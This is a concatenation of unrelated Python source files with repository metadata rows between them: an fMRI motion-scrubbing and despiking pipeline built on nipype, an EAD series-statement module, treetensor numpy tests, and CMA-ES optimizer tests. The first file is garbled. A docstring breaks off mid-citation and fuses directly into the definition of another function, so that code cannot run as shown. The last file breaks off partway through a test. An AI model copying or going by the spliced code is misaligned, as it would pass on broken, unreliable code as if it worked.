name='inputspec')
inputspec.inputs.threshold = 0.2 #mm
#TODO_ready check CPAC.generate_motion_statistics.generate_motion_statistics script. It may use the FD of Jenkinson to index volumes which violate the upper threhold limit, no matter what we set.
# - we use the power method to calculate FD
above_thr = pe.MapNode(utility.Function(input_names=['in_file',
'threshold',
'frames_before',
'frames_after'],
output_names=['frames_in_idx', 'frames_out_idx', 'percentFD', 'percent_scrubbed_file', 'fd_scrubbed_file', 'nvol'],
function=above_threshold),
iterfield=['in_file'],
name='above_threshold')
above_thr.inputs.frames_before = ex_before
above_thr.inputs.frames_after = ex_after
# Save outputs which are important
ds_fd_scrub = pe.Node(interface=io.DataSink(),
name='ds_fd_scrub')
ds_fd_scrub.inputs.base_directory = SinkDir
ds_fd_scrub.inputs.regexp_substitutions = [("(\/)[^\/]*$", "FD_scrubbed.csv")]
pop_perc_scrub = pe.Node(interface=utils_convert.List2TxtFileOpen,
name='pop_perc_scrub')
# save data out with Datasink
ds_pop_perc_scrub = pe.Node(interface=io.DataSink(), name='ds_pop_perc_scrub')
ds_pop_perc_scrub.inputs.regexp_substitutions = [("(\/)[^\/]*$", "pop_percent_scrubbed.txt")]
ds_pop_perc_scrub.inputs.base_directory = SinkDir
# Generate the weird input for the scrubbing procedure which is done in afni
craft_scrub_input = pe.MapNode(utility.Function(input_names=['scrub_input', 'frames_in_1D_file'],
output_names=['scrub_input_string'],
function=get_indx),
iterfield=['scrub_input', 'frames_in_1D_file'],
name='scrubbing_craft_input_string')
# Scrub the image
scrubbed_preprocessed = pe.MapNode(utility.Function(input_names=['scrub_input'],
output_names=['scrubbed_image'],
function=scrub_image),
iterfield=['scrub_input'],
name='scrubbed_preprocessed')
myqc = qc.timecourse2png("timeseries", tag="040_censored")
outputspec = pe.Node(utility.IdentityInterface(fields=['scrubbed_image', 'FD_scrubbed']),
name='outputspec')
# save data out with Datasink
ds=pe.Node(interface=io.DataSink(),name='ds')
ds.inputs.base_directory=SinkDir
#TODO_ready: some plot for qualitiy checking
# Create workflow
analysisflow = pe.Workflow(wf_name)
###Calculating mean Framewise Displacement (FD) as Power et al., 2012
# Calculating frames to exclude and include after scrubbing
analysisflow.connect(inputspec, 'FD', above_thr, 'in_file')
analysisflow.connect(inputspec, 'threshold', above_thr, 'threshold')
# Create the proper format for the scrubbing procedure
analysisflow.connect(above_thr, 'frames_in_idx', craft_scrub_input, 'frames_in_1D_file')
analysisflow.connect(above_thr, 'percent_scrubbed_file', ds, 'percentFD') # TODO save this in separate folder for QC
analysisflow.connect(inputspec, 'func', craft_scrub_input, 'scrub_input')
# Do the scubbing
analysisflow.connect(craft_scrub_input, 'scrub_input_string', scrubbed_preprocessed, 'scrub_input')
# Output
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', outputspec, 'scrubbed_image')
analysisflow.connect(above_thr, 'fd_scrubbed_file', outputspec, 'FD_scrubbed') #TODO_ready: scrub FD file, as well
analysisflow.connect(above_thr, 'fd_scrubbed_file', ds_fd_scrub, 'FD_scrubbed')
analysisflow.connect(above_thr, 'percent_scrubbed_file', pop_perc_scrub, 'in_list')
analysisflow.connect(pop_perc_scrub, 'txt_file', ds_pop_perc_scrub, 'pop')
# Save a few files
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', ds, 'scrubbed_image')
#analysisflow.connect(above_thr, 'percentFD', ds, 'scrubbed_image.@numberofvols')
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', myqc, 'inputspec.func')
return analysisflow
def spikereg_workflow(SinkTag="func_preproc", wf_name="data_censoring_despike"):
"""
Description:
Calculates volumes to be excluded, creates the despike regressor matrix
Workflow inputs:
:param FD: the frame wise displacement calculated by the MotionCorrecter.py script
:param threshold: threshold of FD volumes which should be excluded
:param SinkDir:
:param SinkTag: The output directory in which the returned images (see workflow outputs) could be found in a subdirectory directory specific for this workflow..
Workflow outputs:
:return: spikereg_workflow - workflow
Tamas Spisak
tamas.spisak@uk-essen.de
2018
References
----------
.. [1] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Spurious
but systematic correlations in functional connectivity MRI networks arise from subject motion. NeuroImage, 59(3),
2142-2154. doi:10.1016/j.neuroimage.2011.10.018
.. [2] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Steps
toward optimizing motion artifact removal in functional connectivity MRI; a reply to Carp.
NeuroImage. doi:10.1016/j.neuroimage.2012.03.017
.. [3] Jenkinson, M., Bannister, P., Brady, M., Smith, S., 2002. Improved optimization for the robust
and accuratedef datacens_workflow(SinkTag="func_preproc", wf_name="data_censoring"):
"""
import os
import nipype
import nipype.pipeline as pe
import nipype.interfaces.utility as utility
import nipype.interfaces.io as io
import PUMI.utils.globals as globals
import PUMI.utils.QC as qc
SinkDir = os.path.abspath(globals._SinkDir_ + "/" + SinkTag)
if not os.path.exists(SinkDir):
os.makedirs(SinkDir)
# Identitiy mapping for input variables
inputspec = pe.Node(utility.IdentityInterface(fields=['func',
'FD',
'threshold',]),
name='inputspec')
inputspec.inputs.threshold = 5
#TODO_ready check CPAC.generate_motion_statistics.generate_motion_statistics script. It may use the FD of Jenkinson to index volumes which violate the upper threhold limit, no matter what we set.
# - we use the power method to calculate FD
# Determine the indices of the upper part (which is defined by the threshold, deafult 5%) of values based on their FD values
calc_upprperc = pe.MapNode(utility.Function(input_names=['in_file',
'threshold'],
output_names=['frames_in_idx', 'frames_out_idx', 'percentFD', 'out_file', 'nvol'],
function=calculate_upperpercent),
iterfield=['in_file'],
name='calculate_upperpercent')
#create despiking matrix, to be included into nuisance correction
despike_matrix = pe.MapNode(utility.Function(input_names=['frames_excluded', 'total_vols'],
output_names=['despike_mat'],
function=create_despike_regressor_matrix),
iterfield=['frames_excluded', 'total_vols'],
name='create_despike_matrix')
outputspec = pe.Node(utility.IdentityInterface(fields=['despike_mat', 'FD']),
name='outputspec')
# save data out with Datasink
ds=pe.Node(interface=io.DataSink(),name='ds')
ds.inputs.base_directory=SinkDir
#TODO_ready: some plot for qualitiy checking
# Create workflow
analysisflow = pe.Workflow(wf_name)
###Calculating mean Framewise Displacement (FD) as Power et al., 2012
# Calculating frames to exclude and include after scrubbing
analysisflow.connect(inputspec, 'FD', calc_upprperc, 'in_file')
analysisflow.connect(inputspec, 'threshold', calc_upprperc, 'threshold')
# Create the proper format for the scrubbing procedure
analysisflow.connect(calc_upprperc, 'frames_out_idx', despike_matrix, 'frames_excluded')
analysisflow.connect(calc_upprperc, 'nvol', despike_matrix, 'total_vols')
analysisflow.connect(calc_upprperc, 'out_file', ds, 'percentFD') # TODO save this in separet folder for QC
# Output
analysisflow.connect(despike_matrix, 'despike_mat', outputspec, 'despike_mat')
analysisflow.connect(inputspec, 'FD', outputspec, 'FD')
return analysisflow
def above_threshold(in_file, threshold=0.2, frames_before=1, frames_after=2):
import os
import numpy as np
from numpy import loadtxt, savetxt
powersFD_data = loadtxt(in_file, skiprows=1)
np.insert(powersFD_data, 0, 0) # TODO_ready: why do we need this: see output of nipype.algorithms.confounds.FramewiseDisplacement
frames_in_idx = np.argwhere(powersFD_data < threshold)[:, 0]
frames_out = np.argwhere(powersFD_data >= threshold)[:, 0]
extra_indices = []
for i in frames_out:
# remove preceding frames
if i > 0:
count = 1
while count <= frames_before:
extra_indices.append(i - count)
count += 1
# remove following frames
count = 1
while count <= frames_after:
if i+count < len(powersFD_data): # do not censor unexistent data
extra_indices.append(i + count)
count += 1
indices_out = list(set(frames_out) | set(extra_indices))
indices_out.sort()
frames_out_idx = indices_out
frames_in_idx = np.setdiff1d(frames_in_idx, indices_out)
FD_scrubbed = powersFD_data[frames_in_idx]
fd_scrubbed_file = os.path.join(os.getcwd(), 'FD_scrubbed.csv')
savetxt(fd_scrubbed_file, FD_scrubbed, delimiter=",")
frames_in_idx_str = ','.join(str(x) for x in frames_in_idx)
frames_in_idx = frames_in_idx_str.split()
percentFD = (len(frames_out_idx) * 100 / (len(powersFD_data) + 1)) # % of frames censored
percent_scrubbed_file = os.path.join(os.getcwd(), 'percent_scrubbed.txt')
f = open(percent_scrubbed_file, 'w')
f.write("%.3f" % (percentFD))
f.close()
nvol = len(powersFD_data)
return frames_in_idx, frames_out_idx, percentFD, percent_scrubbed_file, fd_scrubbed_file, nvol
def calculate_upperpercent(in_file,threshold, frames_before=1, frames_after=2):
import os
import numpy as np
from numpy import loadtxt
# Receives the FD file to calculate the upper percent of violating volumes
powersFD_data = loadtxt(in_file, skiprows=1)
np.insert(powersFD_data, 0, 0) # TODO_ready: why do we need this: see output of nipype.algorithms.confounds.FramewiseDisplacement
sortedpwrsFDdata = sorted(powersFD_data)
limitvalueindex = int(len(sortedpwrsFDdata) * threshold / 100)
limitvalue = sortedpwrsFDdata[len(sortedpwrsFDdata) - limitvalueindex]
frames_in_idx = np.argwhere(powersFD_data < limitvalue)[:,0]
frames_out = np.argwhere(powersFD_data >= limitvalue)[:, 0]
extra_indices = []
for i in frames_out:
# remove preceding frames
if i > 0:
count = 1
while count <= frames_before:
extra_indices.append(i - count)
count += 1
# remove following frames
count = 1
while count <= frames_after:
if i+count < len(powersFD_data): # do not censor unexistent data
extra_indices.append(i + count)
count += 1
indices_out = list(set(frames_out) | set(extra_indices))
indices_out.sort()
frames_out_idx=indices_out
frames_in_idx=np.setdiff1d(frames_in_idx, indices_out)
frames_in_idx_str = ','.join(str(x) for x in frames_in_idx)
frames_in_idx = frames_in_idx_str.split()
percentFD =100- (len(frames_out_idx) * 100 / (len(powersFD_data) + 1))
out_file = os.path.join(os.getcwd(), 'numberofcensoredvolumes.txt')
f = open(out_file, 'w')
f.write("%.3f," % (percentFD))
f.close()
nvol=len(powersFD_data)
return frames_in_idx, frames_out_idx, percentFD, out_file, nvol
def get_indx(scrub_input, frames_in_1D_file):
"""
Method to get the list of time
frames that are to be included
Parameters
----------
in_file : string
path to file containing the valid time frames
Returns
-------
scrub_input_string : string
input string for 3dCalc in scrubbing workflow,
looks something like " 4dfile.nii.gz[0,1,2,..100] "
"""
#f = open(frames_in_1D_file, 'r')
#line = f.readline()
#line = line.strip(',')
frames_in_idx_str = '[' + ','.join(str(x) for x in frames_in_1D_file) + ']'
#if line:
# indx = map(int, line.split(","))
#else:
# raise Exception("No time points remaining after scrubbing.")
#f.close()
#scrub_input_string = scrub_input + str(indx).replace(" ", "")
scrub_input_string = scrub_input + frames_in_idx_str
return scrub_input_string
def scrub_image(scrub_input):
"""
Method to run 3dcalc in order to scrub the image. This is used instead of
the Nipype interface for 3dcalc because functionality is needed for
specifying an input file with specifically-selected volumes. For example:
input.nii.gz[2,3,4,..98], etc.
Parameters
----------
scrub_input : string
path to 4D file to be scrubbed, plus with selected volumes to be
included
Returns
-------
scrubbed_image : string
path to the scrubbed 4D file
"""
import os
os.system("3dcalc -a %s -expr 'a' -prefix scrubbed_preprocessed.nii.gz" % scrub_input)
scrubbed_image = os.path.join(os.getcwd(), "scrubbed_preprocessed.nii.gz")
return scrubbed_image
def create_despike_regressor_matrix(frames_excluded, total_vols):
# adapted from C-PAC
"""Create a Numpy array describing which volumes are to be regressed out
during nuisance regression, for de-spiking.
:param frames_excluded: 1D file of the volume indices to be excluded. This
is a 1D text file of integers separated by commas.
:param total_vols: integer value of the length of the time series (number
of volumes).
:return: tsv file consisting of a row for every volume, and a column
for every volume being regressed out, with a 1 where they match.
"""
import numpy as np
import os
#with open(frames_excluded, 'r') as f:
# excl_vols = f.readlines()
excl_vols=frames_excluded
if len(excl_vols) <= 0:
return None
reg_matrix = np.zeros((total_vols, len(excl_vols)), dtype=int)
i = 0
for vol in excl_vols:
reg_matrix[vol][i] = 1
i += 1
np.savetxt("despike_matrix.csv", reg_matrix)
return os.path.join(os.getcwd(),"despike_matrix.csv")
| 44.175958
| 199
| 0.651694
| 3,102
| 25,357
| 5.159574
| 0.141199
| 0.021243
| 0.016495
| 0.00956
| 0.800625
| 0.785629
| 0.764449
| 0.737894
| 0.727773
| 0.719775
| 0
| 0.016458
| 0.254762
| 25,357
| 573
| 200
| 44.253054
| 0.830502
| 0.417321
| 0
| 0.645161
| 1
| 0
| 0.135937
| 0.025069
| 0.004032
| 0
| 0
| 0.005236
| 0
| 1
| 0.032258
| false
| 0
| 0.125
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
632f4df0cdf0bff54927a00ad41302481206d4c2
| 6,302
|
py
|
Python
|
source/SpreadsheettoEAD/func/seriesstmt.py
|
gwiedeman/eadmachine
|
f6c0c0f92fc20ab6dcf4962fda827b7adb4749d4
|
[
"Unlicense"
] | 5
|
2016-01-25T15:27:12.000Z
|
2021-08-17T22:31:48.000Z
|
source/SpreadsheettoEAD/func/seriesstmt.py
|
gwiedeman/eadmachine
|
f6c0c0f92fc20ab6dcf4962fda827b7adb4749d4
|
[
"Unlicense"
] | null | null | null |
source/SpreadsheettoEAD/func/seriesstmt.py
|
gwiedeman/eadmachine
|
f6c0c0f92fc20ab6dcf4962fda827b7adb4749d4
|
[
"Unlicense"
] | null | null | null |
#module for Series Statement (<editionstmt>) for both <control> and <eadheader>
# Use when finding aid is part of a monograph series etc.
import xml.etree.cElementTree as ET
import globals
def seriesstmt(control_root, CSheet):
if CSheet.find('PartofSeries').text or CSheet.find('NumberinSeries').text:
if control_root.find('filedesc/seriesstmt') is None:
if "add_seriesstmt" in globals.new_elements or "add-all" in globals.add_all:
seriesstmt_par = control_root.find('filedesc')
seriesstmt_element = ET.Element('seriesstmt')
if control_root.find('filedesc/editionstmt') is None:
if control_root.find('filedesc/publicationstmt') is None:
series_index = 1
else:
series_index = 2
else:
if control_root.find('filedesc/publicationstmt') is None:
series_index = 2
else:
series_index = 3
seriesstmt_par.insert(series_index, seriesstmt_element)
if CSheet.find('PartofSeries').text:
series_title = ET.Element('titleproper')
seriesstmt_element.append(series_title)
series_title.text = CSheet.find('PartofSeries').text
if CSheet.find('NumberinSeries').text:
series_number = ET.Element('num')
seriesstmt_element.append(series_number)
series_number.text = CSheet.find('NumberinSeries').text
else:
if control_root.find('filedesc/seriesstmt/titleproper') is None or control_root.find('filedesc/seriesstmt/num') is None:
if control_root.find('filedesc/seriesstmt/p') is None:
if control_root.find('filedesc/seriesstmt/titleproper') is None:
#<num> only
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text + " - " + CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = ""
else:
#<titleproper> only
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('NumberinSeries').text + " - " + CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('NumberinSeries').text
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
else:
if control_root.find('filedesc/seriesstmt/titleproper') is None:
if control_root.find('filedesc/seriesstmt/num') is None:
#<p> only
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text + " - " + CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/p').text = ""
else:
# <p> and <num>
if CSheet.find('NumberinSeries').text:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
control_root.find('filedesc/seriesstmt/p').text = ""
else:
if CSheet.find('PartofSeries').text:
control_root.find('filedesc/seriesstmt/num').text = ""
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('PartofSeries').text
else:
control_root.find('filedesc/seriesstmt/num').text = ""
control_root.find('filedesc/seriesstmt/p').text = ""
else:
# <titleproper> and <p>
if CSheet.find('PartofSeries').text:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/p').text = ""
else:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/p').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/p').text = ""
else:
if control_root.find('filedesc/seriesstmt/p') is None:
pass
else:
control_root.find('filedesc/seriesstmt/p').text = ""
#uses both <titleproper> and <num>
if CSheet.find('PartofSeries').text:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = CSheet.find('PartofSeries').text
control_root.find('filedesc/seriesstmt/num').text = ""
else:
if CSheet.find('NumberinSeries').text:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/num').text = CSheet.find('NumberinSeries').text
else:
control_root.find('filedesc/seriesstmt/titleproper').text = ""
control_root.find('filedesc/seriesstmt/num').text = ""
else:
if control_root.find('filedesc/seriesstmt') is None:
pass
else:
control_root.find('filedesc/seriesstmt').clear()
| 49.234375
| 145
| 0.68264
| 735
| 6,302
| 5.755102
| 0.084354
| 0.135225
| 0.180851
| 0.277305
| 0.864539
| 0.827187
| 0.826241
| 0.818203
| 0.777305
| 0.710638
| 0
| 0.000768
| 0.17312
| 6,302
| 128
| 146
| 49.234375
| 0.810977
| 0.037924
| 0
| 0.789916
| 0
| 0
| 0.315555
| 0.189894
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008403
| false
| 0.016807
| 0.016807
| 0
| 0.02521
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6330922940ed646135b43f6ed324255ff3f20a95
| 3,828
|
py
|
Python
|
test/numpy/test_funcs.py
|
opendilab/DI-treetensor
|
fe5f681123c3d6e8d7507fba38586d2edf12e693
|
[
"Apache-2.0"
] | 45
|
2021-09-04T15:57:44.000Z
|
2022-03-11T19:28:56.000Z
|
test/numpy/test_funcs.py
|
opendilab/DI-treetensor
|
fe5f681123c3d6e8d7507fba38586d2edf12e693
|
[
"Apache-2.0"
] | 7
|
2021-09-06T13:06:12.000Z
|
2022-03-03T13:38:05.000Z
|
test/numpy/test_funcs.py
|
opendilab/DI-treetensor
|
fe5f681123c3d6e8d7507fba38586d2edf12e693
|
[
"Apache-2.0"
] | 1
|
2021-09-30T15:18:06.000Z
|
2021-09-30T15:18:06.000Z
|
import numpy as np
import pytest
import treetensor.numpy as tnp
# noinspection DuplicatedCode
@pytest.mark.unittest
class TestNumpyFuncs:
_DEMO_1 = tnp.ndarray({
'a': np.array([[1, 2, 3], [5, 6, 7]]),
'b': np.array([1, 3, 5, 7]),
'x': {
'c': np.array([3, 5, 7]),
'd': np.array([[7, 9]]),
}
})
_DEMO_2 = tnp.ndarray({
'a': np.array([[1, 2, 3], [5, 6, 8]]),
'b': np.array([1, 3, 5, 7]),
'x': {
'c': np.array([3, 5, 7]),
'd': np.array([[7, 9]]),
}
})
_DEMO_3 = tnp.ndarray({
'a': np.array([[1, 2, 3], [5, 6, 7]]),
'b': np.array([1, 3, 5, 7]),
'x': {
'c': np.array([3, 5, 7]),
'd': np.array([[7, 9]]),
}
})
def test_all(self):
assert tnp.all(np.array([True, True, True]))
assert not tnp.all(np.array([True, True, False]))
assert not tnp.all(np.array([False, False, False]))
assert tnp.all(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, True]),
}))
assert not tnp.all(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, False]),
}))
assert not tnp.all(tnp.ndarray({
'a': np.array([False, False, False]),
'b': np.array([False, False, False]),
}))
def test_any(self):
assert tnp.any(np.array([True, True, True]))
assert tnp.any(np.array([True, True, False]))
assert not tnp.any(np.array([False, False, False]))
assert tnp.any(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, True]),
}))
assert tnp.any(tnp.ndarray({
'a': np.array([True, True, True]),
'b': np.array([True, True, False]),
}))
assert not tnp.any(tnp.ndarray({
'a': np.array([False, False, False]),
'b': np.array([False, False, False]),
}))
def test_equal(self):
assert tnp.all(tnp.equal(
np.array([1, 2, 3]),
np.array([1, 2, 3]),
))
assert not tnp.all(tnp.equal(
np.array([1, 2, 3]),
np.array([1, 2, 4]),
))
assert tnp.all(
tnp.equal(self._DEMO_1, self._DEMO_2) == tnp.ndarray({
'a': np.array([[True, True, True], [True, True, False]]),
'b': np.array([True, True, True, True]),
'x': {
'c': np.array([True, True, True]),
'd': np.array([[True, True]]),
}
})
)
assert tnp.all(
tnp.equal(self._DEMO_1, self._DEMO_3) == tnp.ndarray({
'a': np.array([[True, True, True], [True, True, True]]),
'b': np.array([True, True, True, True]),
'x': {
'c': np.array([True, True, True]),
'd': np.array([[True, True]]),
}
})
)
def test_array_equal(self):
assert tnp.all(tnp.array_equal(
np.array([1, 2, 3]),
np.array([1, 2, 3]),
))
assert not tnp.all(tnp.array_equal(
np.array([1, 2, 3]),
np.array([1, 2, 4]),
))
assert tnp.array_equal(self._DEMO_1, self._DEMO_2) == tnp.ndarray({
'a': False,
'b': True,
'x': {
'c': True,
'd': True,
}
})
assert tnp.array_equal(self._DEMO_1, self._DEMO_3) == tnp.ndarray({
'a': True,
'b': True,
'x': {
'c': True,
'd': True,
}
})
| 29.446154
| 75
| 0.416667
| 475
| 3,828
| 3.292632
| 0.084211
| 0.205882
| 0.161125
| 0.191816
| 0.888107
| 0.888107
| 0.86509
| 0.803708
| 0.783887
| 0.696931
| 0
| 0.034057
| 0.386364
| 3,828
| 129
| 76
| 29.674419
| 0.631758
| 0.007053
| 0
| 0.634783
| 0
| 0
| 0.012372
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 1
| 0.034783
| false
| 0
| 0.026087
| 0
| 0.095652
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2d5ecfcaa100e55b0bc2860eaf53801d4b4d29b1
| 13,025
|
py
|
Python
|
venv/Lib/site-packages/fcmaes/test_cma.py
|
StuartMolnar/Whale-Optimization
|
05ebebdb3c676768f8fe6a0e7e7d3c18f70162d2
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/fcmaes/test_cma.py
|
StuartMolnar/Whale-Optimization
|
05ebebdb3c676768f8fe6a0e7e7d3c18f70162d2
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/fcmaes/test_cma.py
|
StuartMolnar/Whale-Optimization
|
05ebebdb3c676768f8fe6a0e7e7d3c18f70162d2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Dietmar Wolz.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory.
import sys
import multiprocessing as mp
import numpy as np
from scipy.optimize import OptimizeResult
from fcmaes.testfun import Wrapper, Rosen, Rastrigin, Eggholder
from fcmaes import cmaes, de, cmaescpp, gcldecpp, retry, advretry
def test_rastrigin_python():
popsize = 100
dim = 3
testfun = Rastrigin(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
# stochastic optimization may fail the first time
for _ in range(5):
# use a wrapper to monitor function evaluations
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
assert(ret.status == 4) # wrong cma termination code
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_python():
popsize = 31
dim = 5
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_ask_tell():
popsize = 31
dim = 5
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
es = cmaes.Cmaes(testfun.bounds,
popsize = popsize, input_sigma = sdevs)
iters = max_eval // popsize
for j in range(iters):
xs = es.ask()
ys = [wrapper.eval(x) for x in xs]
stop = es.tell(ys)
if stop != 0:
break
ret = OptimizeResult(x=es.best_x, fun=es.best_value,
nfev=wrapper.get_count(),
nit=es.iterations, status=es.stop)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_cpp():
popsize = 31
dim = 5
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 100000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaescpp.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_parallel():
popsize = 8
dim = 2
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval,
popsize=popsize, workers = mp.cpu_count())
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_delayed():
popsize = 8
dim = 2
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval,
popsize=popsize, workers = popsize, delayed_update=True)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
# assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(almost_equal(ret.fun, wrapper.get_best_y())) # wrong best y returned
def test_rosen_cpp_parallel():
popsize = 8
dim = 2
testfun = Rosen(dim)
sdevs = [1.0]*dim
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaescpp.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval,
popsize=popsize, workers = mp.cpu_count())
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
